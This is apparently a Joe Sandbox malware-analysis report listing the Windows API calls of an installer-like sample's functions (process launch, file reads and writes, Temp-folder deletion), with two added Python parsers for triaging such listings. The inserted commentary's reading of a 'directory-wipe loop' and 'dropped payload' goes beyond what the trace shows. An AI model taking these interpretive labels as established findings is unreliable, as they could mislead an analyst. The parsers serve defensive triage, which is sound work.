  • Part of subcall function 004055A6: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
  • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
  • Part of subcall function 004055A6: lstrcatW.KERNEL32(Completed,004033F2), ref: 00405601
  • Part of subcall function 004055A6: SetWindowTextW.USER32(Completed,Completed), ref: 00405613
  • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
  • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
  • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
  • Part of subcall function 00405B04: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,C:\Users\user\AppData\Local\Temp\nsxA3A4.tmp,?), ref: 00405B2D
  • Part of subcall function 00405B04: CloseHandle.KERNEL32(?,?,?,C:\Users\user\AppData\Local\Temp\nsxA3A4.tmp,?), ref: 00405B3A
• FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?), ref: 00401FF0
  • Part of subcall function 004069C0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069D1
  • Part of subcall function 004069C0: GetExitCodeProcess.KERNELBASE(?,?), ref: 004069F3
  • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
Similarity
• API ID: MessageSend$CloseProcesslstrlen$ChangeCodeCreateExitFindHandleNotificationObjectSingleTextWaitWindowlstrcatwsprintf
• String ID:
• API String ID: 1543427666-0
• Opcode ID: 1e94bbcab2fbd6c959214ef1cc03fd6035723894d1f7a16309fc7884d05dd9f5
• Instruction ID: fabaa3b6efc7a57357b2805df35000a41c8f44054e7a675a900f3985a4c8ce8a
• Opcode Fuzzy Hash: 1e94bbcab2fbd6c959214ef1cc03fd6035723894d1f7a16309fc7884d05dd9f5
• Instruction Fuzzy Hash: E8F06772905125ABDB20BBA599849DE72B59B00328B25413FE102B22E1C77C4E469AAE
Uniqueness
• Uniqueness Score: -1.00%
APIs
• WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060D7
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                          • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                                                                          • Instruction ID: de33e43015841e90b47a85578f5cc3acb86098a1fa118a6604a55d69533944a7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                                                                          • Instruction Fuzzy Hash: 41E08C3224022AABCF109E508D00EEB3B6CEB003A0F018433FD26E2090D630E83197A4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034B1,00000000,00000000,00403308,000000FF,00000004,00000000,00000000,00000000), ref: 004060A8
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
• Instruction ID: fd87eb1c4e4509ee71b5dc1f82ee1534a3bbef2287d177a98c1a1ef8e7fccbc0
• Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
• Instruction Fuzzy Hash: 11E08C3229021AEBDF119E50CC00AEB7BACEB043A0F018436FD22E3180D671E83187A9
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
• Instruction ID: 5c877ab33ec7e7ab303c696e8a99d36134f19a60efc45403e0926baa73fdbb46
• Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
• Instruction Fuzzy Hash: 9AC09BF57413017BDA209F509D45F1777585790710F15453D7350F50E0CBB4E450D61D
Uniqueness
Uniqueness Score: -1.00%

APIs
• ShellExecuteExW.SHELL32(?), ref: 00405B56
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: ExecuteShell
• String ID:
• API String ID: 587946157-0
• Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
• Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
• Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
• Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
• Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
• Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
• Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08
Uniqueness
Uniqueness Score: -1.00%
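The entries above are Joe Sandbox per-function records: each lists the API calls the recovered function makes (with the call-site address after "ref:"), the memory dump the function was lifted from, and similarity identifiers (Opcode ID, Instruction ID, fuzzy hashes) that can be matched against other reports. The parser below turns such entries into structured records so an analyst can pivot on those identifiers across reports and pull out process-launch calls such as the ShellExecuteExW at 00405B56 without reading every entry by hand. It is an added example, not Joe Sandbox code or the report's own tooling; it assumes only the line layout shown on this page, the field names and the EXECUTION_APIS set are my own choices, and the sample text is constructed from two of the entries above, with one line deliberately keeping the "Download File" link residue that HTML-to-text extraction glues onto dump names.

```python
import re
from dataclasses import dataclass, field

# One API bullet looks like:  • ReadFile.KERNELBASE(00000000,00000004,?), ref: 004060A8
API_RE = re.compile(r"^\u2022\s*(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
# Any other "• Label: value" bullet; the value may be empty, as in "• String ID:".
FIELD_RE = re.compile(r"^\u2022\s*(?P<label>[^:]+):\s*(?P<value>.*)$")
SECTIONS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}
# Assumed set of process-launch APIs to flag (my choice for triage, not a Joe Sandbox list).
EXECUTION_APIS = {"ShellExecuteExW", "ShellExecuteW", "CreateProcessW", "CreateProcessA", "WinExec"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list   # raw argument strings; "?" means the sandbox could not resolve that value
    ref: int     # call-site address parsed from the hex after "ref:"

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    source_file: str = ""
    associated: list = field(default_factory=list)
    snapshot_file: str = ""
    fields: dict = field(default_factory=dict)   # Offset, API ID, Opcode ID, fuzzy hashes, ...
    uniqueness_score: str = ""

def parse_records(text):
    """Split HTML-to-text Joe Sandbox function entries into FunctionRecord objects."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        # Extraction glues the "Download File" link label onto dump names; drop it.
        if line.endswith("Download File"):
            line = line[: -len("Download File")].rstrip()
        if line in SECTIONS:
            if line == "APIs":                # every entry begins with its APIs section
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None:
            continue
        if section == "APIs":
            if m := API_RE.match(line):
                args = [a for a in m.group("args").split(",") if a]
                current.apis.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
            continue
        if line.startswith("Uniqueness Score:"):
            current.uniqueness_score = line.split(":", 1)[1].strip()
            continue
        if not (m := FIELD_RE.match(line)):
            continue
        label, value = m.group("label").strip(), m.group("value").strip()
        if label == "Source File":            # "<dump>, Offset: 00400000, based on PE: true"
            dump, *extras = [p.strip() for p in value.split(",")]
            current.source_file = dump
            current.fields.update(dict(tuple(map(str.strip, e.split(":", 1))) for e in extras))
        elif label == "Associated":
            current.associated.append(value)
        elif label == "Snapshot File":
            current.snapshot_file = value
        else:
            current.fields[label] = value
    return records

def execution_primitives(records):
    """(API name, call-site address) for every call that can start a new process."""
    return [(c.name, c.ref) for r in records for c in r.apis if c.name in EXECUTION_APIS]

def index_by_opcode_id(records):
    """Opcode ID -> records; the same ID in two reports means a byte-identical function body."""
    index = {}
    for r in records:
        index.setdefault(r.fields.get("Opcode ID", ""), []).append(r)
    return index

# Constructed sample: two entries copied from this report, one line keeping the "Download File" residue.
SAMPLE_REPORT = """
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034B1,00000000,00000000,00403308,000000FF,00000004,00000000,00000000,00000000), ref: 004060A8
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: FileRead
• String ID:
• Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Uniqueness
Uniqueness Score: -1.00%
APIs
• ShellExecuteExW.SHELL32(?), ref: 00405B56
Similarity
• API ID: ExecuteShell
• Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
Uniqueness Score: -1.00%
"""
```

Feed the whole "Function" section of a report to parse_records, then compare index_by_opcode_id outputs from two reports: a shared Opcode ID with differing API IDs usually means the same packer or installer stub was reused, while a record whose only API is a process-launch primitive is the place to start when tracing how the dropped payload gets executed.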

APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034C2
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• KiUserCallbackDispatcher.NTDLL(?,00404299), ref: 004044CC
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• CloseHandle.KERNEL32(FFFFFFFF,00403A4C,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B24
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003FB), ref: 004049E0
• SetWindowTextW.USER32(00000000,?), ref: 00404A0A
• SHBrowseForFolderW.SHELL32(?), ref: 00404ABB
• CoTaskMemFree.OLE32(00000000), ref: 00404AC6
• lstrcmpiW.KERNEL32(: Completed,00422F08,00000000,?,?), ref: 00404AF8
• lstrcatW.KERNEL32(?,: Completed), ref: 00404B04
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B16
  • Part of subcall function 00405B65: GetDlgItemTextW.USER32(?,?,00000400,00404B4D), ref: 00405B78
  • Part of subcall function 004067CF: CharNextW.USER32(?,*?|<>/":,00000000,00434000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
  • Part of subcall function 004067CF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
  • Part of subcall function 004067CF: CharNextW.USER32(?,00434000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
  • Part of subcall function 004067CF: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
• GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BD9
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BF4
  • Part of subcall function 00404D4D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
  • Part of subcall function 00404D4D: wsprintfW.USER32 ref: 00404DF7
  • Part of subcall function 00404D4D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
• String ID: 47305662$: Completed$A$fh
• API String ID: 2624150263-3915006841
Uniqueness

Uniqueness Score: -1.00%

APIs
• DeleteFileW.KERNEL32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405C56
• lstrcatW.KERNEL32(00424F10,\*.*), ref: 00405C9E
• lstrcatW.KERNEL32(?,0040A014), ref: 00405CC1
• lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405CC7
• FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405CD7
• FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D77
• FindClose.KERNEL32(00000000), ref: 00405D86
Strings
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                          • API String ID: 2035342205-3042786806
                                                                                                                                                                                          • Opcode ID: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                                                                                                                                                                          • Instruction ID: aec485693c4c1533f42b9347a66a6bbcb57ea8568fe9c979ecac7928daa7b7f5
                                                                                                                                                                                          • Opcode Fuzzy Hash: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8741D230801A14BADB31BB659D4DAAF7678EF41718F14813FF801B11D5D77C8A829EAE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

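The function at 00405C56 above chains FindFirstFileW/FindNextFileW over a "\*.*" file spec under the user's Temp directory with DeleteFileW in the same body, which is the shape of a directory-wipe loop. When triaging many such records it helps to parse the sandbox's "APIs" listing mechanically rather than eyeballing it. The following is an added example, not code from Joe Sandbox or its IDA plugin: a small Python parser for the `Api.MODULE(args), ref: ADDR` lines (including the indented "Part of subcall function" form used elsewhere in this report) plus a pattern check that flags the enumerate-and-delete combination, a wildcard file spec, and hard-coded drive paths. The sample lines are copied from this function's listing; the flag names and helper functions are assumptions of this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# Constructed sample: the seven API lines of the function at 00405C56, copied
# verbatim from this report's IDA-plugin listing.
SAMPLE = r"""
• DeleteFileW.KERNEL32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405C56
• lstrcatW.KERNEL32(00424F10,\*.*), ref: 00405C9E
• lstrcatW.KERNEL32(?,0040A014), ref: 00405CC1
• lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405CC7
• FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405CD7
• FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D77
• FindClose.KERNEL32(00000000), ref: 00405D86
"""

# Constructed sample of the indented "subcall" form the listing uses for calls
# made by a callee, copied from the dialog-setup function later in this report.
SUBCALL_LINE = "  • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3"

# One listing line: optional bullet, optional subcall prefix, Api.MODULE(args), ref: call-site address.
API_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                      # address of the call site inside the function
    subcall: Optional[str] = None  # callee the sandbox attributed the call to, if any


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every 'Api.MODULE(args), ref: ADDR' line; lines that do not match are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue
        # Arguments in this listing are 8-digit hex words, '?', or resolved string
        # literals. None of the literals here contain commas, so a plain split is
        # enough; a literal with an embedded comma would need a real tokenizer.
        raw = m.group("args")
        args = raw.split(",") if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, m.group("ref"), m.group("sub")))
    return calls


def literal_args(calls: List[ApiCall]) -> Set[str]:
    """Arguments the sandbox resolved to strings rather than raw words or unknowns."""
    return {a for c in calls for a in c.args if a != "?" and not HEX8_RE.match(a)}


def flag_patterns(calls: List[ApiCall]) -> List[str]:
    """Heuristic labels for one function record (names are this example's own)."""
    apis = {c.api for c in calls}
    literals = literal_args(calls)
    flags: List[str] = []
    if {"FindFirstFileW", "FindNextFileW"} <= apis and "DeleteFileW" in apis:
        flags.append("enumerate-and-delete")
    if any(a.endswith(r"\*.*") for a in literals):
        flags.append("wildcard-filespec")
    if any(re.match(r"^[A-Za-z]:\\", a) for a in literals):
        flags.append("hardcoded-path")
    return flags


if __name__ == "__main__":
    record = parse_api_lines(SAMPLE)
    for c in record:
        print(f"{c.ref}  {c.module}!{c.api}  literals={[a for a in c.args if a in literal_args([c])]}")
    print("flags:", flag_patterns(record))
```

Feeding the whole report's function listings through `parse_api_lines` one record at a time and keeping only records that raise `enumerate-and-delete` together with a path under Temp or AppData is a quick way to separate cleanup loops like this one from the ordinary file I/O of an installer stub.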
APIs
